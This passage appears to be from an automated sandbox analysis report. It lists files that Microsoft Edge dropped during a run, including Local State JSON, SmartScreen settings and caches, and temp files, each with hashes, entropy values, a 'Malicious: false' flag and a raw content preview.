Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39e25.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.012525499726859
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclUXRdVUry:YWLSGTt1o9LuLgfGBPAzkVj/T8lUrVoy
MD5:	23A7C468F80AAE5366335BE39861A62A
SHA1:	D47DCDDD4D7F798F245EA142BB70F91DFD0D98E3
SHA-256:	7DC9DDFF47E3798EF0E36864EAFE640CB092E19010787F73E432C9C755282D0B
SHA-512:	BF11AB27A533DE4C7C044AD85878676266F4EAA5E4528B68936C871D2FC2549C4894EE9D452CBBB975498CC41DDF588983C4BFBF3BE33516279197D5C816B76B
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1731217648018783}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
MD5:	F732DBED9289177D15E236D0F8F2DDD3
SHA1:	53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
SHA-256:	2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
SHA-512:	B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d5c7534e-1fa9-463e-8695-ba7819474049.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030798980089624
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn4PGWv/sxtwK7VLyMV/YoskFoz:z/0+zI7ynMv/4KgVeZoskG
MD5:	1FC4D33D2391DA75D606504B7377857B
SHA1:	90A18EB231477BB54E0CF059B6FF6B1EA3C71438
SHA-256:	044E5D0491E02BE3623E7545C5CE866AE1696648514AC0D701799F77F1112FCB
SHA-512:	623379D76262A9BF8A0CB934EBB13710D399D3E2EEDBAD227046ACF2C3E1CCB8E0FD57EE3A78E7C33636CF0072750C7C9328DD90DE9E036F2469CD97C16DEAE7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d7851fb6-450d-432f-9cf9-4443e0c6408a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59247
Entropy (8bit):	6.100485588306515
Encrypted:	false
SSDEEP:	1536:TMk1rT8HbaUvMPGWv/sxtwJUoEzuTFo17VLyMV/Yosa:TMYrT87Mv/4KGo9h2VeZosa
MD5:	CC4E2C682C75F3984FBADB3451DDEBFB
SHA1:	5A8CD93EB03CE6F4C8A77ADF348796F19E042D74
SHA-256:	554063D3296EA52C8D8C337E2D8192292856806BAA93E7AFFE567B264217067D
SHA-512:	7D90F2E1ED82B531F4098A6F0FA3BDBEFB30E23FEF1CC02315C360B7FEB36BEC831C28422A7241CA920211EE83AF28E6B383B95191BAB63512923C7A259BE6EC
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"288ad005-e8dd-423a-954b-570f8390b883"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f148624f-316f-4c69-80f7-6f54fb85c52e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59170
Entropy (8bit):	6.100381267464722
Encrypted:	false
SSDEEP:	1536:TMk1rT8HRaUuPGWv/sxtwJUoEzuTFo17VLyMV/Yosa:TMYrT8xev/4KGo9h2VeZosa
MD5:	3B873DAB1270E3C9D6C33B5D2923EDA3
SHA1:	67B5A4776CFF7331A4AEBAAF2808068DBC9ECFA5
SHA-256:	E743D688CFE28EAE00DF5CAF68ADDAA0FCC51B12E1A4CBB110CCE7982D441A71
SHA-512:	0869524BC7CEE60004A5E6FA08F1AC04DCD9296D0F182B1F8AD248CB37E764871223A43C27165008FE3D5587CC3C82607A006780A46BA6736D5B78204A871347
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"288ad005-e8dd-423a-954b-570f8390b883"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8339303979671135
Encrypted:	false
SSDEEP:	48:uiTrlKxrgx70xl9Il8uCjDL1N/f+KuVCCgusxsZFPUBd1rc:m+IYQj1V+KuVptsxs7Ui
MD5:	3E920C9D1E8E6ABA36D1EDF6CE95028D
SHA1:	AF812301CEC2A9B1C4D5BD94C2F13A745B84D73F
SHA-256:	8DAF926037B720785C10F39472B572EABD5FB04AE98F1A5DF35083F7F3688C76
SHA-512:	99DBB68B6E786D891A7F5D8C1CEC3BD8A968A35E1E1A425A7A6B20E0C6CE435CF16BF8FE7AF4A1AFE3A311FE57B717E2E16E6B2F2DC7AA2D80F5EC0085B9BEFA
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.A.U.r.h.W.A.y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.x.3./.G.1.v.

